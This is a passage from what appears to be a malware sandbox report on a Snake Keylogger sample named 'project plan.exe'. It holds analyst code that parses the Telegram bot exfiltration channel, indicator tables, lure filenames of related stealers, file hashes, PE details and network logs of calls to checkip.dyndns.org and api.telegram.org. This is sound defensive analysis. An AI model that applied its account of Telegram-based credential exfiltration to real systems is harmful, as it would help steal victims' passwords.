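    or None when the boundary has another shape (GUIDs, random strings)."""
    m = re.fullmatch(r"-+([0-9a-fA-F]{12,16})", boundary)
    return ticks_to_datetime(int(m.group(1), 16)) if m else None


def indicators(url: str) -> dict:
    """The pieces worth sharing: the token identifies the bot, the chat_id
    the operator's chat; the bare domain is not an indicator."""
    c = parse_telegram_c2(url)
    return {} if c is None else {"telegram_bot_token": c["token"], "telegram_chat_id": c["chat_id"]}


if __name__ == "__main__":
    print(parse_telegram_c2(C2_URL))
    print(boundary_timestamp(BOUNDARY))
```

For this report the boundary decodes to 2024-07-03 03:28:04 on the sandbox's local clock, two seconds before the 03:28:06 RegAsm.exe entry in the report's timeline further down, which is what one expects if the boundary is built right before the upload. The decoded caption reads " Pc Name: user | Snake Tracker" followed by a blank line and "PW | user | Snake", the template the report's URL shows with its victim fields already filled in.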
IP addresses (IP; domain; country; ASN; ASN name; malicious):
149.154.167.220; api.telegram.org; United Kingdom; 62041; TELEGRAMRU; malicious: true
132.226.247.73; checkip.dyndns.com; United States; 16989; UTMEMUS; malicious: false
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1466687
                Start date and time:2024-07-03 09:27:14 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 18s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:project plan.exe
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winEXE@10/5@2/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 93%
                • Number of executed functions: 117
                • Number of non-executed functions: 8
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 13.89.179.12, 20.189.173.22
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
03:28:06 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
03:28:17 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Safeguard and Grow Your Assets.html | malicious | Unknown |
149.154.167.220 | Cheat.malware_exe.exe | malicious | Unknown |
149.154.167.220 | Cheat.malware_exe.exe | malicious | Unknown |
149.154.167.220 | Kh7W85ONS7.exe | malicious | AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer |
149.154.167.220 | hatabat.exe | malicious | Blank Grabber, DCRat, XWorm |
149.154.167.220 | Evo Resou_nls..scr.exe | malicious | AsyncRAT |
149.154.167.220 | Wave.exe | malicious | XWorm |
149.154.167.220 | RFQ 52165 Materiale vario OENAGROUP.pdf.exe | malicious | AgentTesla, PureLog Stealer |
149.154.167.220 | New Order Ergun Makina Hirdavat Tic #102718.exe | malicious | AgentTesla, PureLog Stealer, zgRAT |
132.226.247.73 | MT_01452_03607PDF.exe | malicious | PureLog Stealer, Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | oHchwlxMNG.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | vsl particulars packing list.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Order Details.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | itinerary_1719382117.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Halkbank_Ekstre_20240625_082306_910668.bat.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | 242010.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | Baltic questionnaire.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.23220.28486.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.247.73 | SecuriteInfo.com.Win32.TrojanX-gen.29327.20826.exe | malicious | Snake Keylogger | checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | IMG_0178520003023PDF.exe | malicious | PureLog Stealer, Snake Keylogger | 158.101.44.242
checkip.dyndns.com | MT_01452_03607PDF.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.247.73
checkip.dyndns.com | PETUNJUK-PENGISIAN DAN PENGIRIMAN KONFIRMASI EDITED.xlsx.scr.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | whiteee.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | whiteee.exe | malicious | Snake Keylogger | 158.101.44.242
checkip.dyndns.com | lista de cotizaciones.xlam.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | Details.exe | malicious | Snake Keylogger | 132.226.8.169
checkip.dyndns.com | PM114079-990528.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | Bank Slip 2.doc | malicious | Snake Keylogger | 158.101.44.242
api.telegram.org | Safeguard and Grow Your Assets.html | malicious | Unknown | 149.154.167.220
api.telegram.org | Cheat.malware_exe.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Cheat.malware_exe.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | Kh7W85ONS7.exe | malicious | AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer | 149.154.167.220
api.telegram.org | hatabat.exe | malicious | Blank Grabber, DCRat, XWorm | 149.154.167.220
api.telegram.org | Wave.exe | malicious | XWorm | 149.154.167.220
api.telegram.org | RFQ 52165 Materiale vario OENAGROUP.pdf.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
api.telegram.org | New Order Ergun Makina Hirdavat Tic #102718.exe | malicious | AgentTesla, PureLog Stealer, zgRAT | 149.154.167.220
api.telegram.org | Kyeryong Construction - Products List & Spec.exe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Safeguard and Grow Your Assets.html | malicious | Unknown | 149.154.167.220
TELEGRAMRU | 82xul16VKj.exe | malicious | CryptOne, Vidar | 149.154.167.99
TELEGRAMRU | https://sula.starladeroff.com/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | https://tr.alertsgame.ru/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | file.exe | malicious | Vidar | 149.154.167.99
TELEGRAMRU | file.exe | malicious | PureLog Stealer, Vidar | 149.154.167.99
TELEGRAMRU | pDHKarOK2v.exe | malicious | CryptOne, Vidar | 149.154.167.99
TELEGRAMRU | https://telegrambot-resolved.pages.dev/ | malicious | Unknown | 149.154.167.99
TELEGRAMRU | 1719859269.0326595_setup.exe | malicious | LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig | 149.154.167.99
UTMEMUS | MT_01452_03607PDF.exe | malicious | PureLog Stealer, Snake Keylogger | 132.226.247.73
UTMEMUS | lista de cotizaciones.xlam.exe | malicious | Snake Keylogger | 132.226.8.169
UTMEMUS | Details.exe | malicious | Snake Keylogger | 132.226.8.169
UTMEMUS | oHchwlxMNG.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | scan copy.exe | malicious | Snake Keylogger | 132.226.8.169
UTMEMUS | CDMZxujRpn.elf | malicious | Mirai | 132.192.25.142
UTMEMUS | vsl particulars packing list.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | Order Details.exe | malicious | Snake Keylogger | 132.226.247.73
UTMEMUS | LETTER OF AUTHORIZATION.exe | malicious | Snake Keylogger | 132.226.8.169
UTMEMUS | Order Details.exe | malicious | Snake Keylogger | 132.226.8.169
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Inquiry Studbolt - 240703.vbe | malicious | GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 2024.scr.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Enquiry Quote - 24071834-01.vbs | malicious | GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | DHL AWB COMMERCAIL INVOICE AND TRACKING DETAILS.exe | malicious | AgentTesla | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | 2669976595_366408723_KHI_SOF_240702_0957_P.vbs | malicious | GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | DHL Polska_Powiadomienie oprzesy#U0142ce 28036893335.vbs | malicious | GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | AF85714759_htm#U00b7pdf.vbs | malicious | Remcos, GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Zapytanie ofertowe (GASTRON 07022024).vbs | malicious | AgentTesla, GuLoader | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | B24E33 ENQUIRY.vbe | malicious | AgentTesla, PureLog Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Purchase Order N#U00b0 20240702.vbs | malicious | AgentTesla, GuLoader | 149.154.167.220
                                  No context
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):65536
                                  Entropy (8bit):1.0365186031279516
                                  Encrypted:false
                                  SSDEEP:384:Fs82o+GuizUnUFaGmCFzuiFTY4lO8ybY:682VIUnUFaOzuiFTY4lO8
                                  MD5:C132D4B0E3674820607E68F2CA7C5CCA
                                  SHA1:923A9BCC498E12F712B1E7AFA7A9B9AD25C5804C
                                  SHA-256:49C9BF61DC9C2C08ED4577AE230B336677B4127795BE5A205C801460C22DD082
                                  SHA-512:3D02EAAE678F999B26117EE7EFACBEE8288A31BEE945AB3D20CCE0259BF634253BB2DBF97E984BA064E3D3C7B7CAACF9E2F988760F024FB08B094D8904EAC3DB
                                  Malicious:true
                                  Reputation:low
                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.4.4.6.5.2.7.8.7.7.1.8.3.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.4.4.6.5.2.7.9.3.9.6.8.3.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.e.e.e.d.9.7.-.6.c.0.3.-.4.b.0.a.-.a.0.b.8.-.f.c.f.e.0.b.5.7.4.7.2.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.1.5.c.2.3.d.-.8.1.6.e.-.4.f.d.1.-.b.8.d.e.-.4.5.0.5.9.8.b.1.8.f.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.r.o.j.e.c.t. .p.l.a.n...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.I.r.u.l.o.g.i.x.i.h.e.j.o.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.0.0.-.0.0.0.1.-.0.0.1.4.-.0.7.8.b.-.2.d.8.6.1.a.c.d.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.8.b.5.8.6.a.4.f.a.b.a.b.2.7.9.5.e.2.8.4.7.6.7.b.8.9.7.a.3.f.3.0.0.0.0.0.0.0.0.!.0.0.0.0.2.d.3.7.6.1.4.b.b.0.7.5.a.8.5.8.0.f.c.5.f.e.7.8.5.1.d.e.d.b.c.8.8.9.1.1.9.4.4.c.!.p.r.o.j.e.c.t.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:Mini DuMP crash report, 16 streams, Wed Jul 3 07:27:59 2024, 0x1205a4 type
                                  Category:dropped
                                  Size (bytes):425157
                                  Entropy (8bit):3.372526431202278
                                  Encrypted:false
                                  SSDEEP:3072:lBHM9MYL24TVJ9cSaFFVDovuzkFhEdh0U1CCqqB6Z3+vj12O84P:lBHMaPuVXaqvuzhD3qm6Z3Q3
                                  MD5:331FA175A52E693D94E9A815D73B4C5F
                                  SHA1:3445A52A3F1CD49998796E511BDC9F47CCB63B49
                                  SHA-256:32FEEF063CD7E25F99BAC72827678829EE4EB3560F2A9AC93FAD296ABF51A83D
                                  SHA-512:D782F412C77343C465BFA0F5A1C5F29B932B7681F89FE4D5D0DAAC64BD4E0C643C0C78FB29885651FBE2FE1B5401B85070F407DFD81983F8B7E2B7749DC0EA39
                                  Malicious:false
                                  Reputation:low
                                  Preview:MDMP..a..... ..........f....................................$........................I..dv..........l.......8...........T............(..=T...........8...........:..............................................................................eJ......d;......Lw......................T...........|..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):8812
                                  Entropy (8bit):3.711282976935528
                                  Encrypted:false
                                  SSDEEP:192:R6l7wVeJuPLyy46YEIcCP+Kgmfzn48prI89b6vFcfUTU/m:R6lXJuL346YEDCPtgmfzn4s6vOfUw+
                                  MD5:A163BEC480701011F68FFB794614EEAD
                                  SHA1:1A1D829D2BB758B7C7BE780CAD2BFB0F1DFC393F
                                  SHA-256:02A35452980E952B3ED19023AAAA7644448E40BB7B050A3D7D84778525E9DB31
                                  SHA-512:97BD7DE534E31368EB553166BFD6741EFDFDB664DBCD5F5BC15DD3DFB056E671CEBBEA0568DDB11666A530DD894BA881A17D9E6EFC9F8DA99E244F56C763D629
                                  Malicious:false
                                  Reputation:low
                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.5.3.6.<./.P.i.
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):4773
                                  Entropy (8bit):4.503460048051616
                                  Encrypted:false
                                  SSDEEP:96:uIjfnI7Ql7VqfJQlfmsiDx1JWiS03iS7d:uIzYQl7cIfmzHZS0ySp
                                  MD5:0EFE6EED1D0BEFC396A9A8D7020E94D4
                                  SHA1:F1A3A8D6FE719D58C7E083E3F8ABF6CEA4CF27B8
                                  SHA-256:D85457FE32D2E0F03F6A81E58A583FD5B672F7913D1F55B967D69E1A3C2CF215
                                  SHA-512:EA47205A5175A42BE76022A48656C9254167F3AD47690A7A714B50E948A75B8BF0D74312BE9437EE126625A278FF443783797A8C5A5B55B5623A11A65B51C732
                                  Malicious:false
                                  Reputation:low
                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="394470" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.421998644376424
                                  Encrypted:false
                                  SSDEEP:6144:1Svfpi6ceLP/9skLmb0OTXWSPHaJG8nAgeMZMMhA2fX4WABlEnNK0uhiTw:8vloTXW+EZMM6DFyM03w
                                  MD5:D8386AC77A9B11F3298C567B2F6BFB0C
                                  SHA1:DF9E1E8C97630C5DFE92F9FDFA2B5A453A4CA409
                                  SHA-256:0977A2F11505B2C44E8EFE0B4635DB5AFB1E02A837C057DF2DD9FD2F1B88901F
                                  SHA-512:3CFBDDECEEB9FDB1138959EAB02A9E0843C637C8E217102BCE91D0649243DE071E0CF9C6FA2BD1F95883686A71BBE2F617D43FB6791DA3D996C1494FC5CDC066
                                  Malicious:false
                                  Reputation:low
                                  Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.qu.................................................................................................................................................................................................................................................................................................................................................Vvc.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):4.2802833721596025
                                  TrID:
                                  • Win64 Executable Console Net Framework (206006/5) 48.58%
                                  • Win64 Executable Console (202006/5) 47.64%
                                  • Win64 Executable (generic) (12005/4) 2.83%
                                  • Generic Win/DOS Executable (2004/3) 0.47%
                                  • DOS Executable Generic (2002/1) 0.47%
                                  File name:project plan.exe
                                  File size:2'939'959 bytes
                                  MD5:ec263cafbd93faeb218574586bf8e45f
                                  SHA1:2d37614bb075a8580fc5fe7851dedbc88911944c
                                  SHA256:7c801923836d6b568d00a338b6bcf41889a7a9150c41a4274c21e50d9eb86f33
                                  SHA512:cd2f79fcd7cb5a7dc405f7cfd21c47d6ae6557f3a8967b9ba8b466a2e55425d79586b4cb153f69fe8488cc1bd4037e76dafcab29e122b90b3a9a859fbf4601ee
                                  SSDEEP:12288:6ZeDWntewRLkHfkWWAH0tbERlDqKtsR6g:hDeewxUgtQ3qKtsRn
                                  TLSH:7AD51224B6539C43FF68547AC0E231F50AFDAC2BB0F1A44FDF946C8199624BD27916B2
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(..f.........."...0.Z~............... ....@...... ....................................`................................
                                  Icon Hash:00928e8e8686b000
                                  Entrypoint:0x400000
                                  Entrypoint Section:
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows cui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6683E928 [Tue Jul 2 11:48:56 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:
                                  Instruction
                                  dec ebp
                                  pop edx
                                  nop
                                  add byte ptr [ebx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+eax], al
                                  add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa000 | 0x9ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x9dbe | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x7e5a | 0x8000 | 00d3d9ec62aedafc315e13fe1a8e24df | False | 0.619659423828125 | data | 6.4056746280235135 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa000 | 0x9ac | 0xa00 | 1499d6da2aa3276dd945e2ef9e380bbc | False | 0.3078125 | data | 4.208644838669497 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa0b8 | 0x384 | data | | | 0.4855555555555556
RT_VERSION | 0xa43c | 0x384 | data | English | United States | 0.49333333333333335
RT_MANIFEST | 0xa7c0 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 09:27:59.145376921 CEST | 49704 | 80 | 192.168.2.5 | 132.226.247.73
Jul 3, 2024 09:27:59.150438070 CEST | 80 | 49704 | 132.226.247.73 | 192.168.2.5
Jul 3, 2024 09:27:59.150511026 CEST | 49704 | 80 | 192.168.2.5 | 132.226.247.73
Jul 3, 2024 09:27:59.150829077 CEST | 49704 | 80 | 192.168.2.5 | 132.226.247.73
Jul 3, 2024 09:27:59.155960083 CEST | 80 | 49704 | 132.226.247.73 | 192.168.2.5
Jul 3, 2024 09:27:59.836782932 CEST | 80 | 49704 | 132.226.247.73 | 192.168.2.5
Jul 3, 2024 09:27:59.890115023 CEST | 49704 | 80 | 192.168.2.5 | 132.226.247.73
Jul 3, 2024 09:28:05.368868113 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:05.368895054 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:05.369019985 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:05.373893023 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:05.373903036 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:05.989229918 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:05.989320993 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:05.993237972 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:05.993248940 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:05.993514061 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:06.036619902 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:06.084498882 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:06.084615946 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:06.084624052 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:06.462151051 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:06.462233067 CEST | 443 | 49711 | 149.154.167.220 | 192.168.2.5
Jul 3, 2024 09:28:06.462301970 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:28:06.465882063 CEST | 49711 | 443 | 192.168.2.5 | 149.154.167.220
Jul 3, 2024 09:29:04.834810019 CEST | 80 | 49704 | 132.226.247.73 | 192.168.2.5
Jul 3, 2024 09:29:04.834989071 CEST | 49704 | 80 | 192.168.2.5 | 132.226.247.73
Jul 3, 2024 09:29:39.843600035 CEST | 49704 | 80 | 192.168.2.5 | 132.226.247.73
Jul 3, 2024 09:29:39.848464966 CEST | 80 | 49704 | 132.226.247.73 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 3, 2024 09:27:59.097207069 CEST | 53644 | 53 | 192.168.2.5 | 1.1.1.1
Jul 3, 2024 09:27:59.106723070 CEST | 53 | 53644 | 1.1.1.1 | 192.168.2.5
Jul 3, 2024 09:28:05.360338926 CEST | 64906 | 53 | 192.168.2.5 | 1.1.1.1
Jul 3, 2024 09:28:05.368093967 CEST | 53 | 64906 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 3, 2024 09:27:59.097207069 CEST | 192.168.2.5 | 1.1.1.1 | 0x8226 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:28:05.360338926 CEST | 192.168.2.5 | 1.1.1.1 | 0xf452 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 3, 2024 09:27:59.106723070 CEST | 1.1.1.1 | 192.168.2.5 | 0x8226 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jul 3, 2024 09:27:59.106723070 CEST | 1.1.1.1 | 192.168.2.5 | 0x8226 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:27:59.106723070 CEST | 1.1.1.1 | 192.168.2.5 | 0x8226 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:27:59.106723070 CEST | 1.1.1.1 | 192.168.2.5 | 0x8226 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:27:59.106723070 CEST | 1.1.1.1 | 192.168.2.5 | 0x8226 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:27:59.106723070 CEST | 1.1.1.1 | 192.168.2.5 | 0x8226 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jul 3, 2024 09:28:05.368093967 CEST | 1.1.1.1 | 192.168.2.5 | 0xf452 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                  • api.telegram.org
